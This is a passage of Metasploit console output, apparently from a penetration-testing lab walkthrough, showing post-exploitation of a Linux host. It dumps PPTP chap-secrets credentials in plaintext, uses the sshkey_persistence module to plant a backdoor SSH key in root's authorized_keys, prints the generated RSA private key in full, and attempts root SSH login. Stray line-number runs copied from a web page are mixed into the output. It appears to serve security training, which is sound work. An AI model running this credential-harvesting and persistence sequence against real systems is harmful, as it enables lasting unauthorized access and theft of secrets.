192.198.6.3           linux.chapsecrets.creds  chap-secrets.txt          text/csv                                    /root/.msf4/loot/20230324150314_default
_192.198.6.3_linux.chapsecret_875395.txt
msf5 post(linux/gather/pptpd_chap_secrets) > cat /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
[*] exec: cat /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt

Client,Server,Secret,IP
"jackie","attackdefense.com","HiddenNetwork","10.10.10.10"
"ninja","pentesteracademy.com","LearningIsReal","216.146.39.125"
"peter","underground.onion","ReallySecure!!","246.234.63.133"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 post(linux/gather/pptpd_chap_secrets) > use post/linux/manage/sshkey_persistence
msf5 post(linux/manage/sshkey_persistence) > info

       Name: SSH Key Persistence
     Module: post/linux/manage/sshkey_persistence
   Platform: Linux
       Arch: 
       Rank: Excellent

Provided by:
  h00die <mike@shorebreaksecurity.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name             Current Setting       Required  Description
  ----             ---------------       --------  -----------
  CREATESSHFOLDER  false                 yes       If no .ssh folder is found, create it for a user
  PUBKEY                                 no        Public Key File to use. (Default: Create a new one)
  SESSION                                yes       The session to run this module on.
  SSHD_CONFIG      /etc/ssh/sshd_config  yes       sshd_config file
  USERNAME                               no        User to add SSH key to (Default: all users on box)

Description:
  This module will add an SSH key to a specified user (or all), to 
  allow remote login via SSH at any time.

msf5 post(linux/manage/sshkey_persistence) > set SESSION 2
SESSION => 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msf5 post(linux/manage/sshkey_persistence) > exploit

[*] Checking SSH Permissions
[-] Failed to open file: /etc/ssh/sshd_config: core_channel_open: Operation failed: 1
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
[*] Adding key to /root/.ssh/authorized_keys
[+] Key Added
[*] Post module execution completed
msf5 post(linux/manage/sshkey_persistence) > loot

Loot
====

host         service  type                     name                      content     info                            path
----         -------  ----                     ----                      -------     ----                            ----
192.198.6.3           id_rsa                   ssh_id_rsa                text/plain  OpenSSH Private Key File        /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
msf5 post(linux/manage/sshkey_persistence) > cat /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
[*] exec: cat /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAsrN0jcNKAhSb+X7aky4ZfRW1CK8XzRnSbDq7IEIih1bI3Qwn
UwDOL5IGgw2FT1h/Gi96qTy4L+yvMzuFz/aE7sNWRRJuD0YZnIquR0oQc8d40CKe
ZJPU9OPXJru5X823J1qQy3DAKytbwjw8orKrF6yzbWCx3BCm0eJ2akbS9c8vfD4W
cqvKHXLRpX2dixhXYY4TR74GsBTjnMPVVz0C1UC2XWqPd9FjPsdDw005wbNoK+qD
Acnrgb/7Q8XFrghwQMckRENEB1vBDh0pX7vmmyAChCXj0XgMpFPkBAl6/EnVHCT+
LTe9beMmADSOuRY1U/5W1lGUY9HwWWP9qq2jMwIDAQABAoIBAFjbCIpw33zXWJMf
c3mZg40B3Sl7Pp96RnoQXfl1SQv4qBnZsDgCf4OB3YEOmQnSHCkeEKTUD1WtH5Se
9TNqBcFfGadwuY8YsSV4g53pAvM+7SC5Bf9Gzq4SGGonD87GUFreGn8+Ch+tCIw1
PYU8x/wWoIUzflzJXtmf/Hdtzfnw/K/AppJq1tCIr92SWGvy3VPwPs0F7ex8qZiU
P7hfqJipwp1XrAdUKVDB982EDD4QxIOE/Qkhfh7I6phLem78h74brTJWrAavPjVp
1q12Pc2WjwpCh4uwfF4RrmnUld++YUqMxsW9NYiNOvFLHiGkZrI44rtQ1jQh+Azd
12Gbe4ECgYEA6sMuFxLtqKddcix4rSlxA8Z1yFryhhJRDOMDZtg397+lC0Av7Oos
zFJ5FUnAYEhYjcZzULjFpUvt3H2TLdGJQ6lBPrRQKWRKDzvq1SyZb1xYeNy5HQxO
Q/vB0kIcIYIOthaym3NOkfYvpBdQ7Djs3HH+4LukQtZS4qflYnVmy0ECgYEAwt31
f0BvCSb2fQBBwGMy8HlPX1UdjsDsYeQOkGGw0Al3ydJyUIutbiLKqWBfi+Vtp9Nh
nqoIZ4xofKSCz9a5FQTpviQs97r+/ZYFJB6Lg0IbhSdsovYW59mRQaSd57q50Bn9
TIN4OTWchmw5Oq/XtMKsAC2E00D2fDYaVu3UFXMCgYBHSNTp9LltiMR7Mr3B9t92
QgDpwZP62fz6aMRTqjv0YqD+9ZKX4dOQh0p1CFv94HnjMus5C6IYOyIS3Z6fPwzr
Gq3RGHdu2iES1yLLcCt3ARdsO7mJ9H6fbgbAjYp1MkS9Tc8WHMEy2QpGTT4pPG/P
0F2QZ+nM0b+BS3H/n56DAQKBgQC8gcdJMGW5bs2noqX4nH3cjx2vVUFgpVSGZf2I
wlgvB9mvjTs0m8pL7rAqJaaISItJfHzE5it3MCar3OEGeetVYAlV/NzbUTP20Dds
93dypHLG3pqDEpiZ9KhF3h862jGCFIIqkEuu3CPtDahXE2AR5vhIu7/wNLm88wGL
8knl7QKBgASXcQ0N2AbFBy/kx0ZKGyz92vCfTLjLugVwq8GHs76bXYB5AzA5JgK9
vGJsf50zUChmvT4W7vam/BfK7xQrQwXdUtJCpzO77SF/wTqqg2JcEuS0aipngzKG
SZEwAZzsDtP6y13baIVzM9+PRJdCduEDH/XFEPVcRPRzTDeffAgh
-----END RSA PRIVATE KEY-----
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 post(linux/manage/sshkey_persistence) > ssh -i /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt root@192.198.6.3
[*] exec: ssh -i /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt root@192.198.6.3

ssh: connect to host 192.198.6.3 port 22: Connection refused
msf5 post(linux/manage/sshkey_persistence) > services
Services
========

host         port  proto  name         state  info
----         ----  -----  ----         -----  ----
192.198.6.3  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3  1723  tcp    pptp         open